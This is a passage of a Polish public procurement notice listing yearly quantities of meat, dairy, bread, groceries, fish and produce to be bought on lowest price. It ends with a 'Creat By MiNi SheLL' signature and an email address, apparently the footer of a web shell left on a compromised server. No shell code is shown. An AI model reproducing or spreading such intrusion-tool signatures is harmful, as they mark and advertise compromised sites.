34.		Pasztetowa wieprzowa 	kg	150		
35.		Pieczeń rzymska wieprzowa	kg	150		
36.		Polędwica drobiowa	kg	300		
37.		Polędwica sopocka	kg	150		
38.		Rolada schabowa	kg	250		
39.		Salceson  wieprzowy	kg	120		
40.		Szynka drobiowa	kg	250		
41.		Szynka konserwowa	kg	250		
42.		Szynka wieprzowa wędzona gotowana	kg	 200		
43.		Wędzonka krotoszyńska	kg	200		
44.		Słonina b/s	kg	160		
45.		Smalec	kg	150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.41.21.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Mleko i produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.		Jogurt naturalny 150g	sztuk	1.400		
2.		Jogurt naturalny 450g	sztuk	200		
3.		Jogurt owocowy 150g	sztuk	5.500		
4.		Kefir 400g	sztuk	450		
5.		Masło ekstra (kostka 200g)	kg	1.900		
6.		Mleko spożywcze 2 %	l	19.500		
7.		Mleko długoterminowe 2 %	l	500		
8.		Mleko zsiadłe 400g	sztuk	450		
9.		Ser żółty (twardy)	kg	300		
10.		Serek homogenizowany smakowy150 g	sztuk	4.000		
11.		Serek homogenizowany naturalny 150g	sztuk	800		
12.		Serek topiony 100g	sztuk	1.500		
13.		Serek wiejski 200g	sztuk	1.800		
14.		Śmietana 18 %- 24 %	l	900		
15.		Twaróg tłusty	kg	1.250.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pieczywo i wyroby cukiernicze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.		Bułka 50 g	szt.	46.000	
2.		Bułka 400 g krojona	szt.	4.500	
3.		Bułka 400 g niekrojona	szt.	300	
4.		Bułka grahamka 100 g	szt.	6.000	
5.		Bułka tarta 500g	szt.	230 	
6.		Bułki słodkie 100g (z serem, marmoladą, jabłkiem, jagodami)	szt.	1.500	
7.		Chleb 1 kg krojony	szt.	9,500	
8.		Chleb razowy 500 g krojony	szt.	2.800	
9.		Rogal bez dodatku cukru 100g	szt.	1.800	
10.		Rogaliki drożdżowe drobne  
z marmoladą wyrób cukierniczy	kg	20	
11.		Ciastka kruche	kg	20	
12.		Pączki 100g	szt.	130.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Różne artykuły spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.		Ananasy puszka 565 g	szt.	200	
2.		Barszcz biały lub żurek /butelka 0,50 l/	szt.	650	
3.		Brzoskwinie w puszcze 820g	szt.	100	
4.		Budyń smaki różne 40g	szt.	1.500	
5.		Chrzan 190g	szt.	200	
6.		Cukier	kg	2.700	
7.		Cukier puder 400g	szt.	      50	
8.		Cukier waniliowy 32 g	szt.	50	
9.		Cynamon  mielony 15g	szt.	10	
10.		Drożdże 100g	szt.	100	
11.		Dżemy różne smaki 280g	szt.	2.800	
12.		Fasola czerwona konserwowa 400g	szt.	100	
13.		Galaretka owocowa smaki różne 75g	szt.	100	
14.		Gałka muszkatołowa mielona 15 g	szt.	8	
15.		Groszek konserwowy 400g	szt.	400	
16.		Herbata granulowana 100g	szt.	1.500 	
17.		Imbir mielony 20 g	szt.	8	
18.		Kakao 100g	szt.	40	
19.		Kasza jęczmienna	kg	650	
20.		Kasza manna 	kg	200	
21.		Keczup łagodny 500 g	szt.	150	
22.		Kisiel 40g	szt.	1.500	
23.		Koncentrat pomidorowy 30 % 950g	szt.	300	
24.		Kukurydza konserwowa 400g	szt.	    350	
25.		Kwasek cytrynowy 20g	szt.	    150	
26.		Liść laurowy 10g	szt.	120	
27.		Majeranek 10g	szt.	350	
28.		Majonez  630 g lub 630 ml	szt.	400	
29.		Mak 400g	szt.	10	
30.		Makaron (świderki, łazanki, kolanko, drobna muszelka)	kg	1.200	
31.		Makaron wstążka - nitka     	kg	500	
32.		Makaron zacierka 0,25 kg	szt. 	750	
33.		Masło roślinne 250g	szt.	1.500	
34.		Mąka pszenna	kg	    1.200	
35.		Mąka tortowa	kg	100	
36.		Mąka ziemniaczana	kg 	    60	
37.		Miód naturalny25g	szt.	5.000	
38.		Musztarda 190 g	szt.	150	
39.		Ocet 0,50 l	szt.	      15	
40.		Ogórek konserwowy  870g/0,90 l	szt.	100	
41.		Olej 1 l 	szt.	750	
42.		Papryka konserwowa  870g/0,90 l	szt.	100	
43.		Papryka słodka 20 g	szt.	150	
44.		Pieprz mielony 20 g	szt.	700	
45.		Płatki jęczmienne 0,50 kg	szt.	    300	
46.		Płatki kukurydziane 0,50 kg	szt.	350	
47.		Płatki owsiane 0,50 kg	szt.	   350	
48.		Proszek do pieczenia 36g	szt.	60	
49.		Przyprawa do potraw 200 g	szt.	1.100 	
50.		Przyprawa w płynie 1 l	szt.	40	
51.		Przyprawa do drobiu 20 g	szt.	50	
52.		Ryż 	kg	1.000	
53.		Seler konserwowy 300 g	szt.	300	
54.		Sól jodowana 	kg	600	
55.		Ziele angielskie 15 g (całe ziarna)	szt.	    250	
56.		Żelatyna 50 g	szt.	      150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.60.00.00-4, 15.33.00.00-0, 15.41.11.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Ryby i konserwy rybne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.		Filet z miruny ze skórą	kg	800	
2.		Karp filet	kg	15	
3.		Rolmopsy	kg	12	
4.		Śledzie po kaszubsku	kg	150	
5.		Makrela wędzona	kg	300	
6.		Paprykarz szczeciński 130 g	szt.	1.500	
7.		Szprot w oleju 300 g	szt.	900	
8.		Szprot w pomidorach 300g	   szt.	900	
9.		Śledź po wiejsku	kg	150	
10.		Tuńczyk w sosie własnym 170 g	szt.	500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Warzywa i owoce mrożone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.		Brokuły 	kg	700		
2.		Fasolka szparagowa 	kg	800		
3.		Leczo 	kg	200		
4.		Mieszanka kompotowa 
opak 2,50 kg	kg	1.100		
5.		Mieszanka warzywna 
7 składnikowa	kg	300		
6.		Szpinak 	kg	100		
7.		Włoszczyzna  	kg	500		
8.		Uszka z kapustą i grzybami 300g	szt.	120.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9, 15.89.60.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Warzywa i owoce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Arbuzy	kg	250		
2.	Banany	kg	800		
3.	Botwina	pęczki	100		
4.	Brokuły	sztuk	300		
5.	Brukselka	kg	80		
6.	Buraki	kg	1.900		
7.	Cebula	kg	1.000		
8.	Cukinia	kg	150		
9.	Cytryny	kg	70		
10.	Czosnek	sztuk	300		
11.	Fasola Jaś	kg	160		
12.	Fasola szpar	kg	250		
13.	Grejfruty	kg	80		
14.	Gruszki	kg	100		
15.	Groch łuszczony	kg	140		
16.	Gruszki suszone	kg	1		
17.	Grzyby susz	kg 	1,50		
18.	Jabłka	kg	3.000		
19.	Jabłka susz.	kg	4		
20.	Jajka	sztuk	36.000		
21.	Kalafior	sztuk	250		
22.	Kapusta biała	kg	450		
23.	Kapusta czerwona	kg	150		
24.	Kapusta kiszona	kg	1.300		
25.	Kapusta młoda	sztuk	450		
26.	Kapusta pekińska	kg	200		
27	Koper	pęczki	550		
28.	Mandarynka	kg	500		
29.	Marchew	kg 	2.500		
30.	Nektarynka	kg	200		
31.	Ogórek kiszony	kg	600		
32.	Ogórek świeży	kg 	400		
33.	Papryka czerwona	kg	150 		
34.	Pieczarki	kg	500		
35.	Pietruszka	kg	500		
36.	Natka pietruszki	pęczki	600		
37.	Pomarańcze	kg	200		
38.	Pomidory	kg	1.350		
39.	Pory	kg 	180		
40.	Rzodkiewka	pęczki	150		
41.	Sałata zielona	sztuk	900		
42.	Seler	kg	900		
43.	Szczaw	kg	15		
44.	Szczypior	pęczki	400		
45.	Śliwki	kg	30		
46.	Śliwki suszone	kg	2		
47.	Truskawki	kg	80		
48.	Winogrona	kg	60		
49.	Wiśnie	kg	50		
50.	Ziemniaki	kg	26.000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.00.00-9, 03.14.25.00-3, 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com